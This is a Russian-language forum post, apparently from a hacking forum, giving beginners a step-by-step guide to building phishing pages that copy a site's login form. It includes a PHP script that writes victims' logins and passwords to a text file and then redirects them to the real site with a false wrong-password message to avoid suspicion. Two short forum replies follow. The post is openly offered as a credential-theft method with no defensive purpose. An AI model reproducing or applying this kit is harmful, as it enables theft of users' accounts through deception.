Делаем Фейк.
Устал читать по форуму
просьбы
сделать фейк такого-то
сайта!
Решил выложить
внятную (на мой
взгляд) и подробную
статью по
созданию фейков для
новичков!
Делаем фейк
Наверняка многие
пришли сюда с
мыслями на подобие \"а
как
взламывать персов в
вовке
\\линухе?\", \"как
взламывать
вконтакте\\почту\\аську?\"
и т.п.
Хотелось бы заранее
предупредить
что мыслить надо шире
и думать о
том как узнавать пароли
вообще
(\"Мысли глобально,
действуй
локально\", а не только
от какого-
то определённого сайта
или
сервера. Важно знать
методики
взлома и уметь
применять нужную
в зависимости от
ситуации. Тот
способ, о котором я
хочу вам
рассказать, по сути
своей является
не взломом, а кражей
паролей
пользователя. Делать
мы это будем
посредством фейка.
Что такое фейк
Фейк (от англ. fake -
подделка,
фальшивка) - это
поддельная веб-
страница (обычно с
формой
авторизации), которая
выглядит
так же как и оригинал,
но создана
с целью передачи
вводимых на ней
паролей создателю. То
есть когда
вы вводите пароль на
фейке, он
сохраняется (создатель
потом
зайдёт и прочтёт ), а вас
перебрасывает на
настоящий сайт.
Делаем свой фейк
Теперь неплохо было бы
рассмотреть сам
процесс создания
таких страниц (фейков),
а именно
узнать подробнее обо
всех
вышеупомянутых
операциях,
проводимых с
реальными
страницами. Как было
сказано
ранее, это копирование,
изменение
и размещение.
Копирование. Это самый
первый
этап, который мы
производим для
того, чтобы наша
страница
выглядела идентично
реальной.
Чтобы пользователь,
зашедший
туда, увидел привычную
и
знакомую форму входа
и без
лишних размышлений о
адресе
страницы ввёл свой
логин и пароль
(и подарил их нам ).
Итак, как
же будем копировать?
Просто
открываем нужный нам
сайт в
броузере opera (именно
opera, так
как она сохранит
страницу точно
так как нам нужно!),
заходим на
страницу авторизации
(то есть
чтобы у нас форма
входа была на
главном плане и чтобы
пользователь не забыл
ввести
пароль ) и сохраняем эту
страницу: файл -
сохранить как...
В появившемся окне
выбираем тип
сохраняемого файла:
HTML-файл с
изображениями, имя:
index. Лучше
сразу создать для фейка
отдельную папку и туда
скидывать
все нужные для него
файлы (в
процессе создания у нас
появится
ещё несколько). Теперь
нам нужно
будет открыть исходный
код
сохранённой страницы и
разобраться в нём. Для
этого
откроем файл
блокнотом, но лучше
скачайте такую
замечательную
программу как NotePad
++. Я сам ей
всегда пользуюсь, так
как вещь это
очень удобная,
универсальная и
намного лучше
блокнота! (скоро
сами поймёте почему. Я
просто
рекомендую :good Итак,
открываем наш
сохранённый
index.htm текстовым
редактором!
Не пугайтесь, это совсем
не так
страшно как кажется!
По уши в html. То что вы
видите
называется html кодом
страницы
(он же исходный код
страницы, он
же просто код ). Когда
вы
сохраняли страницу,
рядом с полем
для ввода логина и
пароля
наверняка были подписи
(логично
предположить что там
было
написано \"логин\",
\"пароль\" ).
Вот по ним и будем
ориентироваться. Ищем
среди всего
этого безобразия такие
слова.
Рядом с ними на
странице у нас
располагались поля
ввода логина и
пасса. В html коде они
будут
выглядеть примерно вот
так:
<input type=\"text\"
name=\"login\"
value=\"\" ......
<input type=\"password\"
name=\"password\" ......
имена полей (выделены
жирным, в
коде идут после
\"name=\" не всегда
будут именно login и
password. Где-
то это могут быть e-mail
и pass , а
где-то и username, parol.
Зависит от
фантазии тех, кто кодил
страничку
Для нас важно уметь
увидеть
имена этих полей среди
всего
остального кода! Ещё
одна
подсказка: блок с
надписями
\"логин\", \"пароль\" и
формами ввода
почти всегда находится
в тэге
<form>. Следующим
действием мы
должны запомнить (а
лучше
временно записать)
имена этих
полей. Далее мы будем
их
использовать в одном
скрипте
(который и будет
заниматься
записью паролей ).
Итак,
записали... ищем чуть
выше
глазами тэг <form> (он
должен
быть примерно в начале
строки).
После него идут
некоторые
параметры самой
формы (в этой же
строке). Примерно такое:
<form name=\"login\"
action=\"users/
passcheck.php\"
method=\"post\"
onsubmit=\"return check
();\">
Нас здесь интересует
всё что
подчёркнуто, а именно
параметр
action. для того чтобы
наш фейк
заработал, нам нужно
после ввода
пользователем значения
запустить
наш кое-какой хитрый
скрипт
(ладно, ладно, скоро
расскажу что
за скрипт ). Допустим, у
нас он
будет называться
login.php. Вот и
прописываем параметру
action
значение login.php (если
параметра
action там нет - введите
его сами:
action=\"login.php\". Так
же стоит
обратить внимание
на
параметр
method (в той же
строчке что form и
action): он может иметь
значение
post или get. Для работы
нашего
скрипта там должно
быть post
(если не так - меняем!).
С этим
файлом у нас всё.
Сохраняемся и
закрываем.
Этот загадочный
скрипт... Как и
обещал, сейчас расскажу
о
предназначении
загадочного
скрипта, уже не
единожды
упомянутого мной ранее
в этом
уроке. Он будет
выполнять
функцию перехвата и
записи
введённых в поля
логина и пароля.
Говоря русским языком,
этот
скрипт запишет логин и
пароль
обманутого
пользователя. Сам
скрипт не очень
большой и не
сложный, написан на
языке php (в
прошлом уроке я о нём
уже
упоминал) и выглядит
вот так:
code:
<?PHP
$Log = $_POST[\'login\'];
$Pass = $_POST
[\'password\'];
$log = fopen
(\"database.txt\",\"at\"
fwrite($log,\"\\n $Log:$Pass
\\n\"
fclose($log);
echo
\"<html><head><META
HTTP-EQUIV=\'Refresh\'
content =\'0; U
?>
Сейчас разберёмся что к
чему...
В первых двух строках
переменным Log и Pass
присваиваются значения
соответствующих полей
из
предыдущего файла.
Именно для
этого мы записывали
названия
полей с сохранённой
страницы: мы
должны указать их
скрипту.
Меняем login и password
из
квадратных скобок на
то, как были
названы поля ввода на
нашей
сохранённой странице
(Э! Кавычки
не трогаем!).
В третьей строке
происходит
открытие файла
database.txt для
записи. Можете назвать
этот файл
как хотите, хоть
IIACCbI_JIOXOB.txt))
Главное - не
забудьте как назвали
(название
должно быть написано
английскими буквами) и
создайте
текстовый документ с
таким
именем в папке с
фейком.
Четвёртая строка -
запись в файл
строки вида \\n $Log:
$Pass \\n, где \\n
- переход на новую
строку, $Log:
$Pass - значения
переменных с
логином и паролем,
записанные
через двоеточие.
Строка пятая -
сохранение,
закрытие файла.
Последняя строка -
редирект
(переадресация) на
другую
страницу (пока юзверь
не просёк
что это фейк). В этой
строчке после
URL= вписываем адрес
страницы,
куда попадёт
пользователь сразу
после того как введёт
логин и
пароль (и снова будте
аккуратны с
кавычкой после адреса -
она
должна там быть!).
Лучше всего
отправить его на
настоящую
страницу (ну откуда там
вы
страничку копировали?)
с
сообщением о вводе
неверного
пароля. Тогда бедолага
решит что
что-то не так ввёл,
попорбует снова
и зайдёт, ничего не
заподозрив!
Итак, отредактировали
скрипт как
нам нужно, сохранили в
файл с
именем login.php
(обратите
внимание на
расширение, а то ещё
сохраните как
login.php.txt ) в
папку с фейком.
Я знаю как делать. И могу любую сделать. Видно что копировал. Опера плохо копирует
BULA, копировал только со своей темы на блоге цмс там все темы так приобразовываются. Да и вобще какая разница главное что создал такую тему и поделился ею